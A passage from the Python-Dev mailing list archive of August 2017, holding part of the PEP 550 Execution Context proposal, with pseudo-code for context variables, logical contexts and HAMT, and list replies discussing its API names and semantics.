new_top_ec_node = ec_node(prev=ec, lc=new_lc) try: tstate.ec = new_top_ec_node return func(*args, **kwargs) finally: tstate.ec = old_top_ec_node * Either ``genobj.send()``, ``genobj.throw()``, ``genobj.close()`` are called on a ``genobj`` generator, in which case the logical context recorded in ``genobj`` is pushed onto the stack:: PyGen_New(PyGenObject *gen): gen.__logical_context__ = sys.new_logical_context() gen_send(PyGenObject *gen, ...): tstate = PyThreadState_Get() if gen.__logical_context__ is not None: old_top_ec_node = tstate.ec new_top_ec_node = ec_node( prev=old_top_ec_node, lc=gen.__logical_context__) try: tstate.ec = new_top_ec_node return _gen_send_impl(gen, ...) finally: gen.__logical_context__ = tstate.ec.lc tstate.ec = old_top_ec_node else: return _gen_send_impl(gen, ...) * Coroutines and asynchronous generators share the implementation with generators, and the above changes apply to them as well. In certain scenarios the EC may need to be squashed to limit the size of the chain. For example, consider the following corner case:: async def repeat(coro, delay): await coro() await asyncio.sleep(delay) loop.create_task(repeat(coro, delay)) async def ping(): print('ping') loop = asyncio.get_event_loop() loop.create_task(repeat(ping, 1)) loop.run_forever() In the above code, the EC chain will grow as long as ``repeat()`` is called. Each new task will call ``sys.run_in_execution_context()``, which will append a new logical context to the chain. To prevent unbounded growth, ``sys.get_execution_context()`` checks if the chain is longer than a predetermined maximum, and if it is, squashes the chain into a single LC:: def get_execution_context(): tstate = PyThreadState_Get() if tstate.ec_len > EC_LEN_MAX: squashed_lc = sys.new_logical_context() ec_node = tstate.ec while ec_node: # The LC.merge() method does not replace existing keys. squashed_lc = squashed_lc.merge(ec_node.lc) ec_node = ec_node.prev return ec_node(prev=NULL, lc=squashed_lc) else: return tstate.ec Logical Context --------------- Logical context is an immutable weak key mapping which has the following properties with respect to garbage collection: * ``ContextVar`` objects are strongly-referenced only from the application code, not from any of the Execution Context machinery or values they point to. This means that there are no reference cycles that could extend their lifespan longer than necessary, or prevent their collection by the GC. * Values put in the Execution Context are guaranteed to be kept alive while there is a ``ContextVar`` key referencing them in the thread. * If a ``ContextVar`` is garbage collected, all of its values will be removed from all contexts, allowing them to be GCed if needed. * If a thread has ended its execution, its thread state will be cleaned up along with its ``ExecutionContext``, cleaning up all values bound to all context variables in the thread. As discussed earluier, we need ``sys.get_execution_context()`` to be consistently fast regardless of the size of the execution context, so logical context is necessarily an immutable mapping. Choosing ``dict`` for the underlying implementation is suboptimal, because ``LC.set()`` will cause ``dict.copy()``, which is an O(N) operation, where *N* is the number of items in the LC. ``get_execution_context()``, when squashing the EC, is a O(M) operation, where *M* is the total number of context variable values in the EC. So, instead of ``dict``, we choose Hash Array Mapped Trie (HAMT) as the underlying implementation of logical contexts. (Scala and Clojure use HAMT to implement high performance immutable collections [5]_, [6]_.) With HAMT ``.set()`` becomes an O(log N) operation, and ``get_execution_context()`` squashing is more efficient on average due to structural sharing in HAMT. See `Appendix: HAMT Performance Analysis`_ for a more elaborate analysis of HAMT performance compared to ``dict``. Context Variables ----------------- The ``ContextVar.lookup()`` and ``ContextVar.set()`` methods are implemented as follows (in pseudo-code):: class ContextVar: def get(self): tstate = PyThreadState_Get() ec_node = tstate.ec while ec_node: if self in ec_node.lc: return ec_node.lc[self] ec_node = ec_node.prev return None def set(self, value): tstate = PyThreadState_Get() top_ec_node = tstate.ec if top_ec_node is not None: top_lc = top_ec_node.lc new_top_lc = top_lc.set(self, value) tstate.ec = ec_node( prev=top_ec_node.prev, lc=new_top_lc) else: top_lc = sys.new_logical_context() new_top_lc = top_lc.set(self, value) tstate.ec = ec_node( prev=NULL, lc=new_top_lc) For efficient access in performance-sensitive code paths, such as in ``numpy`` and ``decimal``, we add a cache to ``ContextVar.get()``, making it an O(1) operation when the cache is hit. The cache key is composed from the following: * The new ``uint64_t PyThreadState->unique_id``, which is a globally unique thread state identifier. It is computed from the new ``uint64_t PyInterpreterState->ts_counter``, which is incremented whenever a new thread state is created. * The ``uint64_t ContextVar->version`` counter, which is incremented whenever the context variable value is changed in any logical context in any thread. The cache is then implemented as follows:: class ContextVar: def set(self, value): ... # implementation self.version += 1 def get(self): tstate = PyThreadState_Get() if (self.last_tstate_id == tstate.unique_id and self.last_version == self.version): return self.last_value value = self._get_uncached() self.last_value = value # borrowed ref self.last_tstate_id = tstate.unique_id self.last_version = self.version return value Note that ``last_value`` is a borrowed reference. The assumption is that if the version checks are fine, the object will be alive. This allows the values of context variables to be properly garbage collected. This generic caching approach is similar to what the current C implementation of ``decimal`` does to cache the the current decimal context, and has similar performance characteristics. Performance Considerations ========================== Tests of the reference implementation based on the prior revisions of this PEP have shown 1-2% slowdown on generator microbenchmarks and no noticeable difference in macrobenchmarks. The performance of non-generator and non-async code is not affected by this PEP. Summary of the New APIs ======================= Python ------ The following new Python APIs are introduced by this PEP: 1. The ``sys.new_context_var(name: str='...')`` function to create ``ContextVar`` objects. 2. The ``ContextVar`` object, which has: * the read-only ``.name`` attribute, * the ``.lookup()`` method which returns the value of the variable in the current execution context; * the ``.set()`` method which sets the value of the variable in the current execution context. 3. The ``sys.get_execution_context()`` function, which returns a copy of the current execution context. 4. The ``sys.new_execution_context()`` function, which returns a new empty execution context. 5. The ``sys.new_logical_context()`` function, which returns a new empty logical context. 6. The ``sys.run_with_execution_context(ec: ExecutionContext, func, *args, **kwargs)`` function, which runs *func* with the provided execution context. 7. The ``sys.run_with_logical_context(lc:LogicalContext, func, *args, **kwargs)`` function, which runs *func* with the provided logical context on top of the current execution context. C API ----- 1. ``PyContextVar * PyContext_NewVar(char *desc)``: create a ``PyContextVar`` object. 2. ``PyObject * PyContext_LookupVar(PyContextVar *)``: return the value of the variable in the current execution context. 3. ``int PyContext_SetVar(PyContextVar *, PyObject *)``: set the value of the variable in the current execution context. 4. ``PyLogicalContext * PyLogicalContext_New()``: create a new empty ``PyLogicalContext``. 5. ``PyLogicalContext * PyExecutionContext_New()``: create a new empty ``PyExecutionContext``. 6. ``PyExecutionContext * PyExecutionContext_Get()``: return the current execution context. 7. ``int PyExecutionContext_Set(PyExecutionContext *)``: set the passed EC object as the current for the active thread state. 8. ``int PyExecutionContext_SetWithLogicalContext(PyExecutionContext *, PyLogicalContext *)``: allows to implement ``sys.run_with_logical_context`` Python API. Design Considerations ===================== Should ``PyThreadState_GetDict()`` use the execution context? ------------------------------------------------------------- No. ``PyThreadState_GetDict`` is based on TLS, and changing its semantics will break backwards compatibility. PEP 521 ------- :pep:`521` proposes an alternative solution to the problem, which extends the context manager protocol with two new methods: ``__suspend__()`` and ``__resume__()``. Similarly, the asynchronous context manager protocol is also extended with ``__asuspend__()`` and ``__aresume__()``. This allows implementing context managers that manage non-local state, which behave correctly in generators and coroutines. For example, consider the following context manager, which uses execution state:: class Context: def __init__(self): self.var = new_context_var('var') def __enter__(self): self.old_x = self.var.lookup() self.var.set('something') def __exit__(self, *err): self.var.set(self.old_x) An equivalent implementation with PEP 521:: local = threading.local() class Context: def __enter__(self): self.old_x = getattr(local, 'x', None) local.x = 'something' def __suspend__(self): local.x = self.old_x def __resume__(self): local.x = 'something' def __exit__(self, *err): local.x = self.old_x The downside of this approach is the addition of significant new complexity to the context manager protocol and the interpreter implementation. This approach is also likely to negatively impact the performance of generators and coroutines. Additionally, the solution in :pep:`521` is limited to context managers, and does not provide any mechanism to propagate state in asynchronous tasks and callbacks. Can Execution Context be implemented outside of CPython? -------------------------------------------------------- No. Proper generator behaviour with respect to the execution context requires changes to the interpreter. Should we update sys.displayhook and other APIs to use EC? ---------------------------------------------------------- APIs like redirecting stdout by overwriting ``sys.stdout``, or specifying new exception display hooks by overwriting the ``sys.displayhook`` function are affecting the whole Python process **by design**. Their users assume that the effect of changing them will be visible across OS threads. Therefore we cannot just make these APIs to use the new Execution Context. That said we think it is possible to design new APIs that will be context aware, but that is outside of the scope of this PEP. Greenlets --------- Greenlet is an alternative implementation of cooperative scheduling for Python. Although greenlet package is not part of CPython, popular frameworks like gevent rely on it, and it is important that greenlet can be modified to support execution contexts. Conceptually, the behaviour of greenlets is very similar to that of generators, which means that similar changes around greenlet entry and exit can be done to add support for execution context. Backwards Compatibility ======================= This proposal preserves 100% backwards compatibility. Appendix: HAMT Performance Analysis =================================== .. figure:: pep-0550-hamt_vs_dict-v2.png :align: center :width: 100% Figure 1. Benchmark code can be found here: [9]_. The above chart demonstrates that: * HAMT displays near O(1) performance for all benchmarked dictionary sizes. * ``dict.copy()`` becomes very slow around 100 items. .. figure:: pep-0550-lookup_hamt.png :align: center :width: 100% Figure 2. Benchmark code can be found here: [10]_. Figure 2 compares the lookup costs of ``dict`` versus a HAMT-based immutable mapping. HAMT lookup time is 30-40% slower than Python dict lookups on average, which is a very good result, considering that the latter is very well optimized. Thre is research [8]_ showing that there are further possible improvements to the performance of HAMT. The reference implementation of HAMT for CPython can be found here: [7]_. Acknowledgments =============== Thanks to Victor Petrovykh for countless discussions around the topic and PEP proofreading and edits. Thanks to Nathaniel Smith for proposing the ``ContextVar`` design [17]_ [18]_, for pushing the PEP towards a more complete design, and coming up with the idea of having a stack of contexts in the thread state. Thanks to Nick Coghlan for numerous suggestions and ideas on the mailing list, and for coming up with a case that cause the complete rewrite of the initial PEP version [19]_. Version History =============== 1. Initial revision, posted on 11-Aug-2017 [20]_. 2. V2 posted on 15-Aug-2017 [21]_. The fundamental limitation that caused a complete redesign of the first version was that it was not possible to implement an iterator that would interact with the EC in the same way as generators (see [19]_.) Version 2 was a complete rewrite, introducing new terminology (Local Context, Execution Context, Context Item) and new APIs. 3. V3 posted on 18-Aug-2017 [22]_. Updates: * Local Context was renamed to Logical Context. The term "local" was ambiguous and conflicted with local name scopes. * Context Item was renamed to Context Key, see the thread with Nick Coghlan, Stefan Krah, and Yury Selivanov [23]_ for details. * Context Item get cache design was adjusted, per Nathaniel Smith's idea in [25]_. * Coroutines are created without a Logical Context; ceval loop no longer needs to special case the ``await`` expression (proposed by Nick Coghlan in [24]_.) 4. V4 posted on 25-Aug-2017: the current version. * The specification section has been completely rewritten. * Context Key renamed to Context Var. * Removed the distinction between generators and coroutines with respect to logical context isolation. References ========== .. [1] https://blog.golang.org/context .. [2] https://msdn.microsoft.com/en-us/library/system.threading.executioncontext.aspx .. [3] https://github.com/numpy/numpy/issues/9444 .. [4] http://bugs.python.org/issue31179 .. [5] https://en.wikipedia.org/wiki/Hash_array_mapped_trie .. [6] http://blog.higher-order.net/2010/08/16/assoc-and-clojures-persistenthashmap-part-ii.html .. [7] https://github.com/1st1/cpython/tree/hamt .. [8] https://michael.steindorfer.name/publications/oopsla15.pdf .. [9] https://gist.github.com/1st1/9004813d5576c96529527d44c5457dcd .. [10] https://gist.github.com/1st1/dbe27f2e14c30cce6f0b5fddfc8c437e .. [11] https://github.com/1st1/cpython/tree/pep550 .. [12] https://www.python.org/dev/peps/pep-0492/#async-await .. [13] https://github.com/MagicStack/uvloop/blob/master/examples/bench/echoserver.py .. [14] https://github.com/MagicStack/pgbench .. [15] https://github.com/python/performance .. [16] https://gist.github.com/1st1/6b7a614643f91ead3edf37c4451a6b4c .. [17] https://mail.python.org/pipermail/python-ideas/2017-August/046752.html .. [18] https://mail.python.org/pipermail/python-ideas/2017-August/046772.html .. [19] https://mail.python.org/pipermail/python-ideas/2017-August/046775.html .. [20] https://github.com/python/peps/blob/e8a06c9a790f39451d9e99e203b13b3ad73a1d01/pep-0550.rst .. [21] https://github.com/python/peps/blob/e3aa3b2b4e4e9967d28a10827eed1e9e5960c175/pep-0550.rst .. [22] https://github.com/python/peps/blob/287ed87bb475a7da657f950b353c71c1248f67e7/pep-0550.rst .. [23] https://mail.python.org/pipermail/python-ideas/2017-August/046801.html .. [24] https://mail.python.org/pipermail/python-ideas/2017-August/046790.html .. [25] https://mail.python.org/pipermail/python-ideas/2017-August/046786.html Copyright ========= This document has been placed in the public domain. From py.lessard at gmail.com Fri Aug 25 21:09:19 2017 From: py.lessard at gmail.com (Pier-Yves Lessard) Date: Fri, 25 Aug 2017 21:09:19 -0400 Subject: [Python-Dev] bpo-30987 review Message-ID: Hello there! I've created a pull request almost a month ago that seems to have very little attention and I was wondering what could be done (if any). The suggested approach on the "Lifecycle of a pull request" page is said to wait for a month then remind the nosy list. Unfortunately, I am the only one on the nosy list, so I skipped to this email directly. I saw some pull request more recent than mine getting a look at, so I thought maybe something was wrong with mine. In any case, let me know if I can do anything to help on that. The feature I added will unlock a quite nice features for the automotive industry. Thank you, Keep up the awesome work! -- *Pier-Yves Lessard* *438-862-5914* -------------- next part -------------- An HTML attachment was scrubbed... URL: From jimjjewett at gmail.com Fri Aug 25 21:45:42 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Fri, 25 Aug 2017 21:45:42 -0400 Subject: [Python-Dev] PEP 550 and other python implementations Message-ID: Should PEP 550 discuss other implementations? E.g., the object space used in pypy? -jJ -------------- next part -------------- An HTML attachment was scrubbed... URL: From ethan at stoneleaf.us Fri Aug 25 22:19:32 2017 From: ethan at stoneleaf.us (Ethan Furman) Date: Fri, 25 Aug 2017 19:19:32 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: <59A0DAB4.2030807@stoneleaf.us> All in all, I like it. Nice job. On 08/25/2017 03:32 PM, Yury Selivanov wrote: > A *context variable* is an object representing a value in the > execution context. A new context variable is created by calling > the ``new_context_var()`` function. A context variable object has > two methods: > > * ``lookup()``: returns the value of the variable in the current > execution context; > > * ``set()``: sets the value of the variable in the current > execution context. Why "lookup" and not "get" ? Many APIs use "get" and it's functionality is well understood. > Conceptually, an *execution context* (EC) is a stack of logical > contexts. There is one EC per Python thread. > > A *logical context* (LC) is a mapping of context variables to their > values in that particular LC. Still don't like the name of "logical context", but we can bike-shed on that later. -- ~Ethan~ From jimjjewett at gmail.com Fri Aug 25 22:26:29 2017 From: jimjjewett at gmail.com (Jim J. Jewett) Date: Fri, 25 Aug 2017 22:26:29 -0400 Subject: [Python-Dev] PEP 550 leak-in vs leak-out, why not just a ChainMap In-Reply-To: References: Message-ID: On Aug 24, 2017 11:02 AM, "Yury Selivanov" wrote: On Thu, Aug 24, 2017 at 10:05 AM, Jim J. Jewett wrote: > On Thu, Aug 24, 2017 at 1:12 AM, Yury Selivanov > On Thu, Aug 24, 2017 > at 12:32 AM, Jim J. Jewett wrote: If you look at this small example: foo = new_context_key() async def nested(): await asyncio.sleep(1) print(foo.get()) async def outer(): foo.set(1) await nested() foo.set(1000) l = asyncio.get_event_loop() l.create_task(outer()) l.run_forever() If will print "1", as "nested()" coroutine will see the "foo" key when it's awaited. Now let's say we want to refactor this snipped and run the "nested()" coroutine with a timeout: foo = new_context_key() async def nested(): await asyncio.sleep(1) print(foo.get()) async def outer(): foo.set(1) await asyncio.wait_for(nested(), 10) # !!! foo.set(1000) l = asyncio.get_event_loop() l.create_task(outer()) l.run_forever() So we wrap our `nested()` in a `wait_for()`, which creates a new asynchronous tasks to run `nested()`. That task will now execute on its own, separately from the task that runs `outer()`. So we need to somehow capture the full EC at the moment `wait_for()` was called, and use that EC to run `nested()` within it. If we don't do this, the refactored code would print "1000", instead of "1". I would expect 1000 to be the right answer! By the time it runs, 1000 (or mask_errors=false, to use a less toy example) is what its own controlling scope requested. If you are sure that you want the value frozen earlier, please make this desire very explicit ... this example is the first I noticed it. And please explain what this means for things like signal or warning masking. ContextKey is declared once for the code that uses it. Nobody else will use that key. Keys have names only for introspection purposes, the implementation doesn't use it, iow: var = new_context_key('aaaaaa') var.set(1) # EC = [..., {var: 1}] # Note the that EC has a "var" object itself as the key in the mapping, not "aaaaa". This I had also not realized. So effectively, they keys are based on object identity, with some safeguards to ensure that even starting with the same (interned) name will *not* produce the same object unless you passed it around explicitly, or are in the same same code unit (file, typically). This strikes me as reasonable, but still surprising. (I think of variables as typically named, rather than identified by address.) So please make this more explicit as well. -jJ -------------- next part -------------- An HTML attachment was scrubbed... URL: From jim.baker at python.org Fri Aug 25 22:49:51 2017 From: jim.baker at python.org (Jim Baker) Date: Fri, 25 Aug 2017 20:49:51 -0600 Subject: [Python-Dev] PEP 550 and other python implementations In-Reply-To: References: Message-ID: re other implementations: the model presented in https://www.python.org/dev/peps/pep-0550/#implementation seems perfectly compatible with Jython. It's just one more thing we would add to PyThreadState (which is what it's also called in the Jython runtime). On Fri, Aug 25, 2017 at 7:45 PM, Jim J. Jewett wrote: > Should PEP 550 discuss other implementations? E.g., the object space used > in pypy? > > -jJ > > _______________________________________________ > Python-Dev mailing list > Python-Dev at python.org > https://mail.python.org/mailman/listinfo/python-dev > Unsubscribe: https://mail.python.org/mailman/options/python-dev/ > jbaker%40zyasoft.com > > -------------- next part -------------- An HTML attachment was scrubbed... URL: From mertz at gnosis.cx Sat Aug 26 00:56:57 2017 From: mertz at gnosis.cx (David Mertz) Date: Fri, 25 Aug 2017 21:56:57 -0700 Subject: [Python-Dev] PEP 550 v4 In-Reply-To: References: Message-ID: This is now looking really good and I can understands it. One question though. Sometimes creation of a context variable is done with a name argument, other times not. E.g. var1 = new_context_var('var1') var = new_context_var() The signature is given as: sys.new_context_var(name: str) But it seems like it should be: sys.new_context_var(name: Optional[str]=None) On Aug 25, 2017 3:35 PM, "Yury Selivanov" wrote: Hi, This is the 4th iteration of the PEP that Elvis and I have rewritten from scratch. The specification section has been separated from the implementation section, which makes them easier to follow. During the rewrite, we realized that generators and coroutines should work with the EC in exactly the same way (coroutines used to be created with no LC in prior versions of the PEP). We also renamed Context Keys to Context Variables which seems to be a more appropriate name. Hopefully this update will resolve the remaining questions about the specification and the proposed implementation, and will allow us to focus on refining the API. Yury PEP: 550 Title: Execution Context Version: $Revision$ Last-Modified: $Date$ Author: Yury Selivanov , Elvis Pranskevichus Status: Draft Type: Standards Track Content-Type: text/x-rst Created: 11-Aug-2017 Python-Version: 3.7 Post-History: 11-Aug-2017, 15-Aug-2017, 18-Aug-2017, 25-Aug-2017 Abstract ======== This PEP adds a new generic mechanism of ensuring consistent access to non-local state in the context of out-of-order execution, such as in Python generators and coroutines. Thread-local storage, such as ``threading.local()``, is inadequate for programs that execute concurrently in the same OS thread. This PEP proposes a solution to this problem. Rationale ========= Prior to the advent of asynchronous programming in Python, programs used OS threads to achieve concurrency. The need for thread-specific state was solved by ``threading.local()`` and its C-API equivalent, ``PyThreadState_GetDict()``. A few examples of where Thread-local storage (TLS) is commonly relied upon: * Context managers like decimal contexts, ``numpy.errstate``, and ``warnings.catch_warnings``. * Request-related data, such as security tokens and request data in web applications, language context for ``gettext`` etc. * Profiling, tracing, and logging in large code bases. Unfortunately, TLS does not work well for programs which execute concurrently in a single thread. A Python generator is the simplest example of a concurrent program. Consider the following:: def fractions(precision, x, y): with decimal.localcontext() as ctx: ctx.prec = precision yield Decimal(x) / Decimal(y) yield Decimal(x) / Decimal(y**2) g1 = fractions(precision=2, x=1, y=3) g2 = fractions(precision=6, x=2, y=3) items = list(zip(g1, g2)) The expected value of ``items`` is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.11'), Decimal('0.222222'))] Rather surprisingly, the actual result is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.111111'), Decimal('0.222222'))] This is because Decimal context is stored as a thread-local, so concurrent iteration of the ``fractions()`` generator would corrupt the state. A similar problem exists with coroutines. Applications also often need to associate certain data with a given thread of execution. For example, a web application server commonly needs access to the current HTTP request object. The inadequacy of TLS in asynchronous code has lead to the proliferation of ad-hoc solutions, which are limited in scope and do not support all required use cases. The current status quo is that any library (including the standard library), which relies on TLS, is likely to be broken when used in asynchronous code or with generators (see [3]_ as an example issue.) Some languages, that support coroutines or generators, recommend passing the context manually as an argument to every function, see [1]_ for an example. This approach, however, has limited use for Python, where there is a large ecosystem that was built to work with a TLS-like context. Furthermore, libraries like ``decimal`` or ``numpy`` rely on context implicitly in overloaded operator implementations. The .NET runtime, which has support for async/await, has a generic solution for this problem, called ``ExecutionContext`` (see [2]_). Goals ===== The goal of this PEP is to provide a more reliable ``threading.local()`` alternative, which: * provides the mechanism and the API to fix non-local state issues with coroutines and generators; * has no or negligible performance impact on the existing code or the code that will be using the new mechanism, including libraries like ``decimal`` and ``numpy``. High-Level Specification ======================== The full specification of this PEP is broken down into three parts: * High-Level Specification (this section): the description of the overall solution. We show how it applies to generators and coroutines in user code, without delving into implementation details. * Detailed Specification: the complete description of new concepts, APIs, and related changes to the standard library. * Implementation Details: the description and analysis of data structures and algorithms used to implement this PEP, as well as the necessary changes to CPython. For the purpose of this section, we define *execution context* as an opaque container of non-local state that allows consistent access to its contents in the concurrent execution environment. A *context variable* is an object representing a value in the execution context. A new context variable is created by calling the ``new_context_var()`` function. A context variable object has two methods: * ``lookup()``: returns the value of the variable in the current execution context; * ``set()``: sets the value of the variable in the current execution context. Regular Single-threaded Code ---------------------------- In regular, single-threaded code that doesn't involve generators or coroutines, context variables behave like globals:: var = new_context_var() def sub(): assert var.lookup() == 'main' var.set('sub') def main(): var.set('main') sub() assert var.lookup() == 'sub' Multithreaded Code ------------------ In multithreaded code, context variables behave like thread locals:: var = new_context_var() def sub(): assert var.lookup() is None # The execution context is empty # for each new thread. var.set('sub') def main(): var.set('main') thread = threading.Thread(target=sub) thread.start() thread.join() assert var.lookup() == 'main' Generators ---------- In generators, changes to context variables are local and are not visible to the caller, but are visible to the code called by the generator. Once set in the generator, the context variable is guaranteed not to change between iterations:: var = new_context_var() def gen(): var.set('gen') assert var.lookup() == 'gen' yield 1 assert var.lookup() == 'gen' yield 2 def main(): var.set('main') g = gen() next(g) assert var.lookup() == 'main' var.set('main modified') next(g) assert var.lookup() == 'main modified' Changes to caller's context variables are visible to the generator (unless they were also modified inside the generator):: var = new_context_var() def gen(): assert var.lookup() == 'var' yield 1 assert var.lookup() == 'var modified' yield 2 def main(): g = gen() var.set('var') next(g) var.set('var modified') next(g) Now, let's revisit the decimal precision example from the `Rationale`_ section, and see how the execution context can improve the situation:: import decimal decimal_prec = new_context_var() # create a new context variable # Pre-PEP 550 Decimal relies on TLS for its context. # This subclass switches the decimal context storage # to the execution context for illustration purposes. # class MyDecimal(decimal.Decimal): def __init__(self, value="0"): prec = decimal_prec.lookup() if prec is None: raise ValueError('could not find decimal precision') context = decimal.Context(prec=prec) super().__init__(value, context=context) def fractions(precision, x, y): # Normally, this would be set by a context manager, # but for simplicity we do this directly. decimal_prec.set(precision) yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) g1 = fractions(precision=2, x=1, y=3) g2 = fractions(precision=6, x=2, y=3) items = list(zip(g1, g2)) The value of ``items`` is:: [(Decimal('0.33'), Decimal('0.666667')), (Decimal('0.11'), Decimal('0.222222'))] which matches the expected result. Coroutines and Asynchronous Tasks --------------------------------- In coroutines, like in generators, context variable changes are local and are not visible to the caller:: import asyncio var = new_context_var() async def sub(): assert var.lookup() == 'main' var.set('sub') assert var.lookup() == 'sub' async def main(): var.set('main') await sub() assert var.lookup() == 'main' loop = asyncio.get_event_loop() loop.run_until_complete(main()) To establish the full semantics of execution context in couroutines, we must also consider *tasks*. A task is the abstraction used by *asyncio*, and other similar libraries, to manage the concurrent execution of coroutines. In the example above, a task is created implicitly by the ``run_until_complete()`` function. ``asyncio.wait_for()`` is another example of implicit task creation:: async def sub(): await asyncio.sleep(1) assert var.lookup() == 'main' async def main(): var.set('main') # waiting for sub() directly await sub() # waiting for sub() with a timeout await asyncio.wait_for(sub(), timeout=2) var.set('main changed') Intuitively, we expect the assertion in ``sub()`` to hold true in both invocations, even though the ``wait_for()`` implementation actually spawns a task, which runs ``sub()`` concurrently with ``main()``. Thus, tasks **must** capture a snapshot of the current execution context at the moment of their creation and use it to execute the wrapped coroutine whenever that happens. If this is not done, then innocuous looking changes like wrapping a coroutine in a ``wait_for()`` call would cause surprising breakage. This leads to the following:: import asyncio var = new_context_var() async def sub(): # Sleeping will make sub() run after # `var` is modified in main(). await asyncio.sleep(1) assert var.lookup() == 'main' async def main(): var.set('main') loop.create_task(sub()) # schedules asynchronous execution # of sub(). assert var.lookup() == 'main' var.set('main changed') loop = asyncio.get_event_loop() loop.run_until_complete(main()) In the above code we show how ``sub()``, running in a separate task, sees the value of ``var`` as it was when ``loop.create_task(sub())`` was called. Like tasks, the intuitive behaviour of callbacks scheduled with either ``Loop.call_soon()``, ``Loop.call_later()``, or ``Future.add_done_callback()`` is to also capture a snapshot of the current execution context at the point of scheduling, and use it to run the callback:: current_request = new_context_var() def log_error(e): logging.error('error when handling request %r', current_request.lookup()) async def render_response(): ... async def handle_get_request(request): current_request.set(request) try: return await render_response() except Exception as e: get_event_loop().call_soon(log_error, e) return '500 - Internal Server Error' Detailed Specification ====================== Conceptually, an *execution context* (EC) is a stack of logical contexts. There is one EC per Python thread. A *logical context* (LC) is a mapping of context variables to their values in that particular LC. A *context variable* is an object representing a value in the execution context. A new context variable object is created by calling the ``sys.new_context_var(name: str)`` function. The value of the ``name`` argument is not used by the EC machinery, but may be used for debugging and introspection. The context variable object has the following methods and attributes: * ``name``: the value passed to ``new_context_var()``. * ``lookup()``: traverses the execution context top-to-bottom, until the variable value is found. Returns ``None``, if the variable is not present in the execution context; * ``set()``: sets the value of the variable in the topmost logical context. Generators ---------- When created, each generator object has an empty logical context object stored in its ``__logical_context__`` attribute. This logical context is pushed onto the execution context at the beginning of each generator iteration and popped at the end:: var1 = sys.new_context_var('var1') var2 = sys.new_context_var('var2') def gen(): var1.set('var1-gen') var2.set('var2-gen') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}) # ] n = nested_gen() # nested_gen_LC is created next(n) # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}) # ] var1.set('var1-gen-mod') var2.set('var2-gen-mod') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}) # ] next(n) def nested_gen(): # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}), # nested_gen_LC() # ] assert var1.lookup() == 'var1-gen' assert var2.lookup() == 'var2-gen' var1.set('var1-nested-gen') # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen', var2: 'var2-gen'}), # nested_gen_LC({var1: 'var1-nested-gen'}) # ] yield # EC = [ # outer_LC(), # gen_LC({var1: 'var1-gen-mod', var2: 'var2-gen-mod'}), # nested_gen_LC({var1: 'var1-nested-gen'}) # ] assert var1.lookup() == 'var1-nested-gen' assert var2.lookup() == 'var2-gen-mod' yield # EC = [outer_LC()] g = gen() # gen_LC is created for the generator object `g` list(g) # EC = [outer_LC()] The snippet above shows the state of the execution context stack throughout the generator lifespan. contextlib.contextmanager ------------------------- Earlier, we've used the following example:: import decimal # create a new context variable decimal_prec = sys.new_context_var('decimal_prec') # ... def fractions(precision, x, y): decimal_prec.set(precision) yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) Let's extend it by adding a context manager:: @contextlib.contextmanager def precision_context(prec): old_rec = decimal_prec.lookup() try: decimal_prec.set(prec) yield finally: decimal_prec.set(old_prec) Unfortunately, this would not work straight away, as the modification to the ``decimal_prec`` variable is contained to the ``precision_context()`` generator, and therefore will not be visible inside the ``with`` block:: def fractions(precision, x, y): # EC = [{}, {}] with precision_context(precision): # EC becomes [{}, {}, {decimal_prec: precision}] in the # *precision_context()* generator, # but here the EC is still [{}, {}] # raises ValueError('could not find decimal precision')! yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) The way to fix this is to set the generator's ``__logical_context__`` attribute to ``None``. This will cause the generator to avoid modifying the execution context stack. We modify the ``contextlib.contextmanager()`` decorator to set ``genobj.__logical_context__`` to ``None`` to produce well-behaved context managers:: def fractions(precision, x, y): # EC = [{}, {}] with precision_context(precision): # EC = [{}, {decimal_prec: precision}] yield MyDecimal(x) / MyDecimal(y) yield MyDecimal(x) / MyDecimal(y**2) # EC becomes [{}, {decimal_prec: None}] asyncio ------- ``asyncio`` uses ``Loop.call_soon``, ``Loop.call_later``, and ``Loop.call_at`` to schedule the asynchronous execution of a function. ``asyncio.Task`` uses ``call_soon()`` to further the execution of the wrapped coroutine. We modify ``Loop.call_{at,later,soon}`` to accept the new optional *execution_context* keyword argument, which defaults to the copy of the current execution context:: def call_soon(self, callback, *args, execution_context=None): if execution_context is None: execution_context = sys.get_execution_context() # ... some time later sys.run_with_execution_context( execution_context, callback, args) The ``sys.get_execution_context()`` function returns a shallow copy of the current execution context. By shallow copy here we mean such a new execution context that: * lookups in the copy provide the same results as in the original execution context, and * any changes in the original execution context do not affect the copy, and * any changes to the copy do not affect the original execution context. Either of the following satisfy the copy requirements: * a new stack with shallow copies of logical contexts; * a new stack with one squashed logical context. The ``sys.run_with_execution_context(ec, func, *args, **kwargs)`` function runs ``func(*args, **kwargs)`` with *ec* as the execution context. The function performs the following steps: 1. Set *ec* as the current execution context stack in the current thread. 2. Push an empty logical context onto the stack. 3. Run ``func(*args, **kwargs)``. 4. Pop the logical context from the stack. 5. Restore the original execution context stack. 6. Return or raise the ``func()`` result. These steps ensure that *ec* cannot be modified by *func*, which makes ``run_with_execution_context()`` idempotent. ``asyncio.Task`` is modified as follows:: class Task: def __init__(self, coro): ... # Get the current execution context snapshot. self._exec_context = sys.get_execution_context() self._loop.call_soon( self._step, execution_context=self._exec_context) def _step(self, exc=None): ... self._loop.call_soon( self._step, execution_context=self._exec_context) ... Generators Transformed into Iterators ------------------------------------- Any Python generator can be represented as an equivalent iterator. Compilers like Cython rely on this axiom. With respect to the execution context, such iterator should behave the same way as the generator it represents. This means that there needs to be a Python API to create new logical contexts and run code with a given logical context. The ``sys.new_logical_context()`` function creates a new empty logical context. The ``sys.run_with_logical_context(lc, func, *args, **kwargs)`` function can be used to run functions in the specified logical context. The *lc* can be modified as a result of the call. The 